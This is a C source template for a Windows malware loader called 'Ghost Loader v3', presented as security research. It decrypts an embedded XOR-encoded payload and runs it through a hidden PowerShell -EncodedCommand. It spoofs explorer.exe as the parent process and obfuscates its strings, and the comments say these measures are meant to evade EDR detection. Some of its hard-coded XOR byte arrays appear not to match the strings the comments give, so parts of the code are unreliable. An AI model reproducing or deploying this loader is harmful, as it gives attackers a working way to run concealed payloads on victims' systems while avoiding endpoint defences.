/*
 * ghost_loader_v3_template.c — Ghost Loader v3 (Parent Spoof + XOR + EncodedCommand)
 * 22DIV / george wu — CSEC research, own hardware only
 *
 * v3 vs v2:
 *   v2: CreateProcessW directly -> powershell -EncodedCommand
 *       EDR sees: ghost_loader.exe (unknown) spawned powershell.exe (suspicious)
 *       RESULT: System Watcher fires on unknown parent → EncodedCommand child
 *
 *   v3: Spoof parent PID as explorer.exe via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
 *       EDR sees: explorer.exe (trusted) spawned powershell.exe (normal)
 *       RESULT: passes parent-child chain check, no behavioral alert
 *
 * Runtime:
 *   1. XOR decrypt payload
 *   2. UTF-8 → UTF-16LE → Base64 (-EncodedCommand)
 *   3. Find explorer.exe PID (XOR-encrypted target name)
 *   4. Open explorer with PROCESS_CREATE_PROCESS
 *   5. CreateProcessW with EXTENDED_STARTUPINFO_PRESENT + attribute list
 *      → spawned powershell.exe appears as explorer.exe child in process tree
 *
 * Generated by build_ghost_loader.py -- do not edit directly.
 * Compile: cl.exe ... /link crypt32.lib kernel32.lib
 */

#include <windows.h>
#include <wincrypt.h>
#include <tlhelp32.h>

#define XOR_KEY /* XOR_KEY_VALUE */

static const unsigned char PAYLOAD_ENC[] = {
    /* PAYLOAD_BYTES */
    0x00
};
static const DWORD PAYLOAD_LEN = sizeof(PAYLOAD_ENC) - 1;

/* ── Wide string append (pure Win32, no CRT) ─────────────────────────────── */
static WCHAR *wadd(WCHAR *dst, const WCHAR *src) {
    while (*dst) dst++;
    while ((*dst++ = *src++));
    return dst - 1;
}

/* ── Build obfuscated PS command ─────────────────────────────────────────── */
static void make_ps_cmd(WCHAR *out, const WCHAR *b64) {
    /* "powershell" XOR 0x01 */
    static const BYTE xps[] = {0x71,0x6e,0x76,0x64,0x72,0x73,0x67,0x64,0x6b,0x6b};
    WCHAR ps[16]; DWORD j;
    for (j = 0; j < 10; j++) ps[j] = (WCHAR)(xps[j] ^ 0x01);
    ps[10] = 0;

    /* "-NoP -NonI -W Hidden -EncodedCommand" XOR 0x21 */
    static const BYTE xfl[] = {
        0x0c,0x4f,0x6f,0x5a,0x01,0x0c,0x4f,0x6f,0x4b,0x01,
        0x0c,0x56,0x01,0x49,0x4c,0x4c,0x4a,0x4e,0x4d,0x01,
        0x0c,0x42,0x4e,0x42,0x4f,0x4a,0x4b,0x41,0x42,0x4f,
        0x44,0x4d,0x4e,0x4e,0x4a,0x4e,0x43
    };
    WCHAR fl[48];
    for (j = 0; j < 37; j++) fl[j] = (WCHAR)(xfl[j] ^ 0x21);
    fl[37] = 0;

    static const WCHAR sp[] = { L' ', 0 };
    out[0] = 0;
    wadd(out, ps); wadd(out, sp); wadd(out, fl); wadd(out, sp); wadd(out, b64);
}

/* ── Find PID of target process (XOR-encrypted name) ──────────────────────
 *
 * "explorer.exe" XOR 0x14:
 *   e=0x65^0x14=0x71, x=0x78^0x14=0x6C, p=0x70^0x14=0x64, l=0x6C^0x14=0x78
 *   o=0x6F^0x14=0x7B, r=0x72^0x14=0x66, .=0x2E^0x14=0x3A, e=0x65^0x14=0x71
 *   x=0x78^0x14=0x6C, e=0x65^0x14=0x71
 */
static const BYTE xExplorer[] = {
    0x71,0x6C,0x64,0x78,0x7B,0x66,0x3A,0x71,0x6C,0x71
};
#define xExplorer_LEN 10

static DWORD FindParentPID(void) {
    BYTE tmp[16];
    WCHAR name[16];
    DWORD j;
    for (j = 0; j < xExplorer_LEN; j++) {
        tmp[j] = xExplorer[j] ^ 0x14;
        name[j] = (WCHAR)tmp[j];
    }
    name[xExplorer_LEN] = 0;
    ZeroMemory(tmp, sizeof(tmp));

    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE) return 0;

    PROCESSENTRY32W pe;
    pe.dwSize = sizeof(pe);
    DWORD pid = 0;
    if (Process32FirstW(snap, &pe)) {
        do {
            if (lstrcmpiW(pe.szExeFile, name) == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32NextW(snap, &pe));
    }
    CloseHandle(snap);
    ZeroMemory(name, sizeof(name));
    return pid;
}

/* ── Launch process with spoofed parent ──────────────────────────────────── */
static BOOL LaunchSpoofed(WCHAR *cmd, DWORD ppid) {
    HANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, ppid);
    if (!hParent) return FALSE;

    SIZE_T attrSize = 0;
    InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
    LPPROC_THREAD_ATTRIBUTE_LIST pal =
        (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize);
    if (!pal) { CloseHandle(hParent); return FALSE; }

    if (!InitializeProcThreadAttributeList(pal, 1, 0, &attrSize)) {
        HeapFree(GetProcessHeap(), 0, pal); CloseHandle(hParent); return FALSE;
    }
    if (!UpdateProcThreadAttribute(pal, 0,
            PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
            &hParent, sizeof(HANDLE), NULL, NULL)) {
        DeleteProcThreadAttributeList(pal);
        HeapFree(GetProcessHeap(), 0, pal); CloseHandle(hParent); return FALSE;
    }

    STARTUPINFOEXW si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi));
    si.StartupInfo.cb      = sizeof(si);
    si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
    si.StartupInfo.wShowWindow = SW_HIDE;
    si.lpAttributeList     = pal;

    BOOL launched = CreateProcessW(NULL, cmd, NULL, NULL, FALSE,
                                   CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT,
                                   NULL, NULL,
                                   (LPSTARTUPINFOW)&si, &pi);
    if (launched) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
    }

    DeleteProcThreadAttributeList(pal);
    HeapFree(GetProcessHeap(), 0, pal);
    CloseHandle(hParent);
    return launched;
}

/* ── WinMain ──────────────────────────────────────────────────────────────── */
int WINAPI WinMain(HINSTANCE hI, HINSTANCE hP, LPSTR lpCmd, int nShow) {
    /* 1. XOR decrypt payload */
    unsigned char *raw = (unsigned char *)HeapAlloc(GetProcessHeap(), 0, PAYLOAD_LEN + 2);
    if (!raw) return 1;
    DWORD i;
    for (i = 0; i < PAYLOAD_LEN; i++)
        raw[i] = PAYLOAD_ENC[i] ^ (unsigned char)XOR_KEY;
    raw[PAYLOAD_LEN] = 0;

    /* 2. UTF-8 → UTF-16LE */
    int wlen = MultiByteToWideChar(CP_UTF8, 0, (LPCSTR)raw, (int)PAYLOAD_LEN, NULL, 0);
    WCHAR *wscript = (WCHAR *)HeapAlloc(GetProcessHeap(), 0, (wlen + 1) * sizeof(WCHAR));
    if (!wscript) { ZeroMemory(raw, PAYLOAD_LEN); HeapFree(GetProcessHeap(), 0, raw); return 1; }
    MultiByteToWideChar(CP_UTF8, 0, (LPCSTR)raw, (int)PAYLOAD_LEN, wscript, wlen);
    wscript[wlen] = 0;
    ZeroMemory(raw, PAYLOAD_LEN); HeapFree(GetProcessHeap(), 0, raw);

    /* 3. Base64 UTF-16LE bytes for -EncodedCommand */
    DWORD b64len = 0;
    CryptBinaryToStringA((BYTE *)wscript, (DWORD)(wlen * sizeof(WCHAR)),
                         CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &b64len);
    char *b64a = (char *)HeapAlloc(GetProcessHeap(), 0, b64len + 1);
    if (!b64a) { ZeroMemory(wscript, wlen * sizeof(WCHAR)); HeapFree(GetProcessHeap(), 0, wscript); return 1; }
    CryptBinaryToStringA((BYTE *)wscript, (DWORD)(wlen * sizeof(WCHAR)),
                         CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, b64a, &b64len);
    b64a[b64len] = 0;
    ZeroMemory(wscript, wlen * sizeof(WCHAR)); HeapFree(GetProcessHeap(), 0, wscript);

    /* 4. ASCII b64 → wide */
    WCHAR *wb64 = (WCHAR *)HeapAlloc(GetProcessHeap(), 0, (b64len + 1) * sizeof(WCHAR));
    if (!wb64) { HeapFree(GetProcessHeap(), 0, b64a); return 1; }
    MultiByteToWideChar(CP_ACP, 0, b64a, -1, wb64, (int)(b64len + 1));
    ZeroMemory(b64a, b64len); HeapFree(GetProcessHeap(), 0, b64a);

    /* 5. Build full command string */
    DWORD cmdlen = b64len + 128;
    WCHAR *cmd = (WCHAR *)HeapAlloc(GetProcessHeap(), 0, cmdlen * sizeof(WCHAR));
    if (!cmd) { HeapFree(GetProcessHeap(), 0, wb64); return 1; }
    make_ps_cmd(cmd, wb64);
    ZeroMemory(wb64, b64len * sizeof(WCHAR)); HeapFree(GetProcessHeap(), 0, wb64);

    /* 6. Find explorer.exe and spoof parent — if not found, fall back to direct launch */
    DWORD ppid = FindParentPID();
    BOOL launched = FALSE;

    if (ppid) {
        launched = LaunchSpoofed(cmd, ppid);
    }

    if (!launched) {
        /* Fallback: direct launch (v2 behaviour) */
        STARTUPINFOW si;
        PROCESS_INFORMATION pi;
        ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi));
        si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE;
        launched = CreateProcessW(NULL, cmd, NULL, NULL, FALSE,
                                  CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
        if (launched) {
            WaitForSingleObject(pi.hProcess, INFINITE);
            CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
        }
    }

    ZeroMemory(cmd, cmdlen * sizeof(WCHAR)); HeapFree(GetProcessHeap(), 0, cmd);
    return 0;
}
